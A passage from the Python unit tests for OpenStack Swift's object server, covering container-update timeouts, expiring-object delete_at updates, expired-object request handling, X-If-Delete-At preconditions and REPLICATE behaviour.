{'logger_thread_locals': (None, None)}]
self.assertEqual(called_async_update_args, [expected])
def test_container_update_as_greenthread_with_timeout(self):
'''
give it one container to update (for only one greenthred)
fake the greenthred so it will raise a timeout
test that the right message is logged and the method returns None
'''
called_async_update_args = []
def local_fake_spawn(func, *a, **kw):
m = mock.MagicMock()
def wait_with_error():
raise Timeout()
m.wait = wait_with_error # because raise can't be in a lambda
return m
def local_fake_async_update(*a, **kw):
# just capture the args to see that we would have called
called_async_update_args.append([a, kw])
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '12345',
'Content-Type': 'application/burrito',
'Content-Length': '0',
'X-Backend-Storage-Policy-Index': 0,
'X-Container-Partition': '20',
'X-Container-Host': '1.2.3.4:5',
'X-Container-Device': 'sdb1'})
with mock.patch.object(object_server, 'spawn',
local_fake_spawn):
with mock.patch.object(self.object_controller,
'container_update_timeout',
1.414213562):
resp = req.get_response(self.object_controller)
# check the response is completed and successful
self.assertEqual(resp.status_int, 201)
# check that the timeout was logged
expected_logged_error = "Container update timeout (1.4142s) " \
"waiting for [('1.2.3.4:5', 'sdb1')]"
self.assertTrue(
expected_logged_error in
self.object_controller.logger.get_lines_for_level('debug'))
def test_container_update_bad_args(self):
policy = random.choice(list(POLICIES))
given_args = []
def fake_async_update(*args):
given_args.extend(args)
req = Request.blank(
'/v1/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '123',
'X-Container-Host': 'chost,badhost',
'X-Container-Partition': 'cpartition',
'X-Container-Device': 'cdevice',
'X-Backend-Storage-Policy-Index': int(policy)})
with mock.patch.object(self.object_controller, 'async_update',
fake_async_update):
self.object_controller.container_update(
'PUT', 'a', 'c', 'o', req, {
'x-size': '0',
'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
'x-content-type': 'text/plain', 'x-timestamp': '1'},
'sda1', policy)
self.assertEqual(given_args, [])
errors = self.object_controller.logger.get_lines_for_level('error')
self.assertEqual(len(errors), 1)
msg = errors[0]
self.assertTrue('Container update failed' in msg)
self.assertTrue('different numbers of hosts and devices' in msg)
self.assertTrue('chost,badhost' in msg)
self.assertTrue('cdevice' in msg)
def test_delete_at_update_on_put(self):
# Test how delete_at_update works when issued a delete for old
# expiration info after a new put with no new expiration info.
policy = random.choice(list(POLICIES))
given_args = []
def fake_async_update(*args):
given_args.extend(args)
req = Request.blank(
'/v1/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '123',
'X-Backend-Storage-Policy-Index': int(policy)})
with mock.patch.object(self.object_controller, 'async_update',
fake_async_update):
self.object_controller.delete_at_update(
'DELETE', 2, 'a', 'c', 'o', req, 'sda1', policy)
self.assertEqual(
given_args, [
'DELETE', '.expiring_objects', '0000000000',
'0000000002-a/c/o', None, None, None,
HeaderKeyDict({
'X-Backend-Storage-Policy-Index': 0,
'x-timestamp': utils.Timestamp('1').internal,
'x-trans-id': '123',
'referer': 'PUT http://localhost/v1/a/c/o'}),
'sda1', policy])
def test_delete_at_negative(self):
# Test how delete_at_update works when issued a delete for old
# expiration info after a new put with no new expiration info.
# Test negative is reset to 0
policy = random.choice(list(POLICIES))
given_args = []
def fake_async_update(*args):
given_args.extend(args)
self.object_controller.async_update = fake_async_update
req = Request.blank(
'/v1/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '1234', 'X-Backend-Storage-Policy-Index':
int(policy)})
self.object_controller.delete_at_update(
'DELETE', -2, 'a', 'c', 'o', req, 'sda1', policy)
self.assertEqual(given_args, [
'DELETE', '.expiring_objects', '0000000000', '0000000000-a/c/o',
None, None, None,
HeaderKeyDict({
# the expiring objects account is always 0
'X-Backend-Storage-Policy-Index': 0,
'x-timestamp': utils.Timestamp('1').internal,
'x-trans-id': '1234',
'referer': 'PUT http://localhost/v1/a/c/o'}),
'sda1', policy])
def test_delete_at_cap(self):
# Test how delete_at_update works when issued a delete for old
# expiration info after a new put with no new expiration info.
# Test past cap is reset to cap
policy = random.choice(list(POLICIES))
given_args = []
def fake_async_update(*args):
given_args.extend(args)
self.object_controller.async_update = fake_async_update
req = Request.blank(
'/v1/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '1234',
'X-Backend-Storage-Policy-Index': int(policy)})
self.object_controller.delete_at_update(
'DELETE', 12345678901, 'a', 'c', 'o', req, 'sda1', policy)
expiring_obj_container = given_args.pop(2)
expected_exp_cont = utils.get_expirer_container(
utils.normalize_delete_at_timestamp(12345678901),
86400, 'a', 'c', 'o')
self.assertEqual(expiring_obj_container, expected_exp_cont)
self.assertEqual(given_args, [
'DELETE', '.expiring_objects', '9999999999-a/c/o',
None, None, None,
HeaderKeyDict({
'X-Backend-Storage-Policy-Index': 0,
'x-timestamp': utils.Timestamp('1').internal,
'x-trans-id': '1234',
'referer': 'PUT http://localhost/v1/a/c/o'}),
'sda1', policy])
def test_delete_at_update_put_with_info(self):
# Keep next test,
# test_delete_at_update_put_with_info_but_missing_container, in sync
# with this one but just missing the X-Delete-At-Container header.
policy = random.choice(list(POLICIES))
given_args = []
def fake_async_update(*args):
given_args.extend(args)
self.object_controller.async_update = fake_async_update
req = Request.blank(
'/v1/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '1234',
'X-Delete-At-Container': '0',
'X-Delete-At-Host': '127.0.0.1:1234',
'X-Delete-At-Partition': '3',
'X-Delete-At-Device': 'sdc1',
'X-Backend-Storage-Policy-Index': int(policy)})
self.object_controller.delete_at_update('PUT', 2, 'a', 'c', 'o',
req, 'sda1', policy)
self.assertEqual(
given_args, [
'PUT', '.expiring_objects', '0000000000', '0000000002-a/c/o',
'127.0.0.1:1234',
'3', 'sdc1', HeaderKeyDict({
# the .expiring_objects account is always policy-0
'X-Backend-Storage-Policy-Index': 0,
'x-size': '0',
'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
'x-content-type': 'text/plain',
'x-timestamp': utils.Timestamp('1').internal,
'x-trans-id': '1234',
'referer': 'PUT http://localhost/v1/a/c/o'}),
'sda1', policy])
def test_delete_at_update_put_with_info_but_missing_container(self):
# Same as previous test, test_delete_at_update_put_with_info, but just
# missing the X-Delete-At-Container header.
policy = random.choice(list(POLICIES))
given_args = []
def fake_async_update(*args):
given_args.extend(args)
self.object_controller.async_update = fake_async_update
self.object_controller.logger = self.logger
req = Request.blank(
'/v1/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '1234',
'X-Delete-At-Host': '127.0.0.1:1234',
'X-Delete-At-Partition': '3',
'X-Delete-At-Device': 'sdc1',
'X-Backend-Storage-Policy-Index': int(policy)})
self.object_controller.delete_at_update('PUT', 2, 'a', 'c', 'o',
req, 'sda1', policy)
self.assertEqual(
self.logger.get_lines_for_level('warning'),
['X-Delete-At-Container header must be specified for expiring '
'objects background PUT to work properly. Making best guess as '
'to the container name for now.'])
def test_delete_at_update_delete(self):
policy = random.choice(list(POLICIES))
given_args = []
def fake_async_update(*args):
given_args.extend(args)
self.object_controller.async_update = fake_async_update
req = Request.blank(
'/v1/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '1234',
'X-Backend-Storage-Policy-Index': int(policy)})
self.object_controller.delete_at_update('DELETE', 2, 'a', 'c', 'o',
req, 'sda1', policy)
self.assertEqual(
given_args, [
'DELETE', '.expiring_objects', '0000000000',
'0000000002-a/c/o', None, None,
None, HeaderKeyDict({
'X-Backend-Storage-Policy-Index': 0,
'x-timestamp': utils.Timestamp('1').internal,
'x-trans-id': '1234',
'referer': 'DELETE http://localhost/v1/a/c/o'}),
'sda1', policy])
def test_delete_backend_replication(self):
# If X-Backend-Replication: True delete_at_update should completely
# short-circuit.
policy = random.choice(list(POLICIES))
given_args = []
def fake_async_update(*args):
given_args.extend(args)
self.object_controller.async_update = fake_async_update
req = Request.blank(
'/v1/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '1234',
'X-Backend-Replication': 'True',
'X-Backend-Storage-Policy-Index': int(policy)})
self.object_controller.delete_at_update(
'DELETE', -2, 'a', 'c', 'o', req, 'sda1', policy)
self.assertEqual(given_args, [])
def test_POST_calls_delete_at(self):
policy = random.choice(list(POLICIES))
given_args = []
def fake_delete_at_update(*args):
given_args.extend(args)
self.object_controller.delete_at_update = fake_delete_at_update
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Length': '4',
'Content-Type': 'application/octet-stream',
'X-Backend-Storage-Policy-Index': int(policy),
'X-Object-Sysmeta-Ec-Frag-Index': 2})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
self.assertEqual(given_args, [])
sleep(.00001)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Type': 'application/x-test',
'X-Backend-Storage-Policy-Index': int(policy)})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
self.assertEqual(given_args, [])
sleep(.00001)
timestamp1 = normalize_timestamp(time())
delete_at_timestamp1 = str(int(time() + 1000))
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': timestamp1,
'Content-Type': 'application/x-test',
'X-Delete-At': delete_at_timestamp1,
'X-Backend-Storage-Policy-Index': int(policy)})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
self.assertEqual(
given_args, [
'PUT', int(delete_at_timestamp1), 'a', 'c', 'o',
given_args[5], 'sda1', policy])
while given_args:
given_args.pop()
sleep(.00001)
timestamp2 = normalize_timestamp(time())
delete_at_timestamp2 = str(int(time() + 2000))
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': timestamp2,
'Content-Type': 'application/x-test',
'X-Delete-At': delete_at_timestamp2,
'X-Backend-Storage-Policy-Index': int(policy)})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
self.assertEqual(
given_args, [
'PUT', int(delete_at_timestamp2), 'a', 'c', 'o',
given_args[5], 'sda1', policy,
'DELETE', int(delete_at_timestamp1), 'a', 'c', 'o',
given_args[5], 'sda1', policy])
def test_PUT_calls_delete_at(self):
policy = random.choice(list(POLICIES))
given_args = []
def fake_delete_at_update(*args):
given_args.extend(args)
self.object_controller.delete_at_update = fake_delete_at_update
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Length': '4',
'Content-Type': 'application/octet-stream',
'X-Backend-Storage-Policy-Index': int(policy),
'X-Object-Sysmeta-Ec-Frag-Index': 4})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
self.assertEqual(given_args, [])
sleep(.00001)
timestamp1 = normalize_timestamp(time())
delete_at_timestamp1 = str(int(time() + 1000))
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp1,
'Content-Length': '4',
'Content-Type': 'application/octet-stream',
'X-Delete-At': delete_at_timestamp1,
'X-Backend-Storage-Policy-Index': int(policy),
'X-Object-Sysmeta-Ec-Frag-Index': 3})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
self.assertEqual(
given_args, [
'PUT', int(delete_at_timestamp1), 'a', 'c', 'o',
given_args[5], 'sda1', policy])
while given_args:
given_args.pop()
sleep(.00001)
timestamp2 = normalize_timestamp(time())
delete_at_timestamp2 = str(int(time() + 2000))
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp2,
'Content-Length': '4',
'Content-Type': 'application/octet-stream',
'X-Delete-At': delete_at_timestamp2,
'X-Backend-Storage-Policy-Index': int(policy),
'X-Object-Sysmeta-Ec-Frag-Index': 3})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
self.assertEqual(
given_args, [
'PUT', int(delete_at_timestamp2), 'a', 'c', 'o',
given_args[5], 'sda1', policy,
'DELETE', int(delete_at_timestamp1), 'a', 'c', 'o',
given_args[5], 'sda1', policy])
def test_GET_but_expired(self):
test_time = time() + 10000
delete_at_timestamp = int(test_time + 100)
delete_at_container = str(
delete_at_timestamp /
self.object_controller.expiring_objects_container_divisor *
self.object_controller.expiring_objects_container_divisor)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(test_time - 2000),
'X-Delete-At': str(delete_at_timestamp),
'X-Delete-At-Container': delete_at_container,
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'X-Timestamp': normalize_timestamp(test_time)})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
orig_time = object_server.time.time
try:
t = time()
object_server.time.time = lambda: t
delete_at_timestamp = int(t + 1)
delete_at_container = str(
delete_at_timestamp /
self.object_controller.expiring_objects_container_divisor *
self.object_controller.expiring_objects_container_divisor)
put_timestamp = normalize_timestamp(test_time - 1000)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': put_timestamp,
'X-Delete-At': str(delete_at_timestamp),
'X-Delete-At-Container': delete_at_container,
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'GET'},
headers={'X-Timestamp': normalize_timestamp(test_time)})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
finally:
object_server.time.time = orig_time
orig_time = object_server.time.time
try:
t = time() + 2
object_server.time.time = lambda: t
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'GET'},
headers={'X-Timestamp': normalize_timestamp(t)})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
self.assertEqual(resp.headers['X-Backend-Timestamp'],
utils.Timestamp(put_timestamp))
finally:
object_server.time.time = orig_time
def test_HEAD_but_expired(self):
test_time = time() + 10000
delete_at_timestamp = int(test_time + 100)
delete_at_container = str(
delete_at_timestamp /
self.object_controller.expiring_objects_container_divisor *
self.object_controller.expiring_objects_container_divisor)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(test_time - 2000),
'X-Delete-At': str(delete_at_timestamp),
'X-Delete-At-Container': delete_at_container,
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'X-Timestamp': normalize_timestamp(test_time)})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
orig_time = object_server.time.time
try:
t = time()
delete_at_timestamp = int(t + 1)
delete_at_container = str(
delete_at_timestamp /
self.object_controller.expiring_objects_container_divisor *
self.object_controller.expiring_objects_container_divisor)
object_server.time.time = lambda: t
put_timestamp = normalize_timestamp(test_time - 1000)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': put_timestamp,
'X-Delete-At': str(delete_at_timestamp),
'X-Delete-At-Container': delete_at_container,
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'X-Timestamp': normalize_timestamp(test_time)})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
finally:
object_server.time.time = orig_time
orig_time = object_server.time.time
try:
t = time() + 2
object_server.time.time = lambda: t
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'X-Timestamp': normalize_timestamp(time())})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
self.assertEqual(resp.headers['X-Backend-Timestamp'],
utils.Timestamp(put_timestamp))
finally:
object_server.time.time = orig_time
def test_POST_but_expired(self):
test_time = time() + 10000
delete_at_timestamp = int(test_time + 100)
delete_at_container = str(
delete_at_timestamp /
self.object_controller.expiring_objects_container_divisor *
self.object_controller.expiring_objects_container_divisor)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(test_time - 2000),
'X-Delete-At': str(delete_at_timestamp),
'X-Delete-At-Container': delete_at_container,
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': normalize_timestamp(test_time - 1500)})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
delete_at_timestamp = int(time() + 1)
delete_at_container = str(
delete_at_timestamp /
self.object_controller.expiring_objects_container_divisor *
self.object_controller.expiring_objects_container_divisor)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(test_time - 1000),
'X-Delete-At': str(delete_at_timestamp),
'X-Delete-At-Container': delete_at_container,
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
orig_time = object_server.time.time
try:
t = time() + 2
object_server.time.time = lambda: t
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': normalize_timestamp(time())})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
finally:
object_server.time.time = orig_time
def test_DELETE_but_expired(self):
test_time = time() + 10000
delete_at_timestamp = int(test_time + 100)
delete_at_container = str(
delete_at_timestamp /
self.object_controller.expiring_objects_container_divisor *
self.object_controller.expiring_objects_container_divisor)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(test_time - 2000),
'X-Delete-At': str(delete_at_timestamp),
'X-Delete-At-Container': delete_at_container,
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
orig_time = object_server.time.time
try:
t = test_time + 100
object_server.time.time = lambda: float(t)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': normalize_timestamp(time())})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
finally:
object_server.time.time = orig_time
def test_DELETE_if_delete_at_expired_still_deletes(self):
test_time = time() + 10
test_timestamp = normalize_timestamp(test_time)
delete_at_time = int(test_time + 10)
delete_at_timestamp = str(delete_at_time)
delete_at_container = str(
delete_at_time /
self.object_controller.expiring_objects_container_divisor *
self.object_controller.expiring_objects_container_divisor)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': test_timestamp,
'X-Delete-At': delete_at_timestamp,
'X-Delete-At-Container': delete_at_container,
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
# sanity
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'X-Timestamp': test_timestamp})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.body, 'TEST')
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
utils.Timestamp(test_timestamp).internal + '.data')
self.assertTrue(os.path.isfile(objfile))
# move time past expirery
with mock.patch('swift.obj.diskfile.time') as mock_time:
mock_time.time.return_value = test_time + 100
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'X-Timestamp': test_timestamp})
resp = req.get_response(self.object_controller)
# request will 404
self.assertEqual(resp.status_int, 404)
# but file still exists
self.assertTrue(os.path.isfile(objfile))
# make the x-if-delete-at with some wrong bits
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': delete_at_timestamp,
'X-If-Delete-At': int(time() + 1)})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
self.assertTrue(os.path.isfile(objfile))
# make the x-if-delete-at with all the right bits
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': delete_at_timestamp,
'X-If-Delete-At': delete_at_timestamp})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 204)
self.assertFalse(os.path.isfile(objfile))
# make the x-if-delete-at with all the right bits (again)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': delete_at_timestamp,
'X-If-Delete-At': delete_at_timestamp})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
self.assertFalse(os.path.isfile(objfile))
# make the x-if-delete-at for some not found
req = Request.blank(
'/sda1/p/a/c/o-not-found',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': delete_at_timestamp,
'X-If-Delete-At': delete_at_timestamp})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
def test_DELETE_if_delete_at(self):
test_time = time() + 10000
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(test_time - 99),
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': normalize_timestamp(test_time - 98)})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 204)
delete_at_timestamp = int(test_time - 1)
delete_at_container = str(
delete_at_timestamp /
self.object_controller.expiring_objects_container_divisor *
self.object_controller.expiring_objects_container_divisor)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(test_time - 97),
'X-Delete-At': str(delete_at_timestamp),
'X-Delete-At-Container': delete_at_container,
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': normalize_timestamp(test_time - 95),
'X-If-Delete-At': str(int(test_time))})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': normalize_timestamp(test_time - 95)})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 204)
delete_at_timestamp = int(test_time - 1)
delete_at_container = str(
delete_at_timestamp /
self.object_controller.expiring_objects_container_divisor *
self.object_controller.expiring_objects_container_divisor)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(test_time - 94),
'X-Delete-At': str(delete_at_timestamp),
'X-Delete-At-Container': delete_at_container,
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': normalize_timestamp(test_time - 92),
'X-If-Delete-At': str(int(test_time))})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': normalize_timestamp(test_time - 92),
'X-If-Delete-At': delete_at_timestamp})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 204)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': normalize_timestamp(test_time - 92),
'X-If-Delete-At': 'abc'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_DELETE_calls_delete_at(self):
given_args = []
def fake_delete_at_update(*args):
given_args.extend(args)
self.object_controller.delete_at_update = fake_delete_at_update
timestamp1 = normalize_timestamp(time())
delete_at_timestamp1 = int(time() + 1000)
delete_at_container1 = str(
delete_at_timestamp1 /
self.object_controller.expiring_objects_container_divisor *
self.object_controller.expiring_objects_container_divisor)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp1,
'Content-Length': '4',
'Content-Type': 'application/octet-stream',
'X-Delete-At': str(delete_at_timestamp1),
'X-Delete-At-Container': delete_at_container1})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
self.assertEqual(given_args, [
'PUT', int(delete_at_timestamp1), 'a', 'c', 'o',
given_args[5], 'sda1', POLICIES[0]])
while given_args:
given_args.pop()
sleep(.00001)
timestamp2 = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': timestamp2,
'Content-Type': 'application/octet-stream'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 204)
self.assertEqual(given_args, [
'DELETE', int(delete_at_timestamp1), 'a', 'c', 'o',
given_args[5], 'sda1', POLICIES[0]])
def test_PUT_delete_at_in_past(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'X-Delete-At': str(int(time() - 1)),
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
self.assertTrue('X-Delete-At in past' in resp.body)
def test_POST_delete_at_in_past(self):
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': normalize_timestamp(time() + 1),
'X-Delete-At': str(int(time() - 1))})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
self.assertTrue('X-Delete-At in past' in resp.body)
def test_REPLICATE_works(self):
def fake_get_hashes(*args, **kwargs):
return 0, {1: 2}
def my_tpool_execute(func, *args, **kwargs):
return func(*args, **kwargs)
was_get_hashes = diskfile.DiskFileManager._get_hashes
was_tpool_exe = tpool.execute
try:
diskfile.DiskFileManager._get_hashes = fake_get_hashes
tpool.execute = my_tpool_execute
req = Request.blank('/sda1/p/suff',
environ={'REQUEST_METHOD': 'REPLICATE'},
headers={})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
p_data = pickle.loads(resp.body)
self.assertEqual(p_data, {1: 2})
finally:
tpool.execute = was_tpool_exe
diskfile.DiskFileManager._get_hashes = was_get_hashes
def test_REPLICATE_timeout(self):
def fake_get_hashes(*args, **kwargs):
raise Timeout()
def my_tpool_execute(func, *args, **kwargs):
return func(*args, **kwargs)
was_get_hashes = diskfile.DiskFileManager._get_hashes
was_tpool_exe = tpool.execute
try:
diskfile.DiskFileManager._get_hashes = fake_get_hashes
tpool.execute = my_tpool_execute
req = Request.blank('/sda1/p/suff',
environ={'REQUEST_METHOD': 'REPLICATE'},
headers={})
self.assertRaises(Timeout, self.object_controller.REPLICATE, req)
finally:
tpool.execute = was_tpool_exe
diskfile.DiskFileManager._get_hashes = was_get_hashes
def test_REPLICATE_insufficient_storage(self):
conf = {'devices': self.testdir, 'mount_check': 'true'}
self.object_controller = object_server.ObjectController(
conf, logger=debug_logger())
self.object_controller.bytes_per_sync = 1
def fake_check_mount(*args, **kwargs):
return False
with mock.patch("swift.obj.diskfile.check_mount", fake_check_mount):
req = Request.blank('/sda1/p/suff',
environ={'REQUEST_METHOD': 'REPLICATE'},
headers={})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 507)
def test_REPLICATE_reclaims_tombstones(self):
conf = {'devices': self.testdir, 'mount_check': False,
'reclaim_age': 100}
self.object_controller = object_server.ObjectController(
conf, logger=self.logger)
for policy in self.iter_policies():
# create a tombstone
ts = next(self.ts)
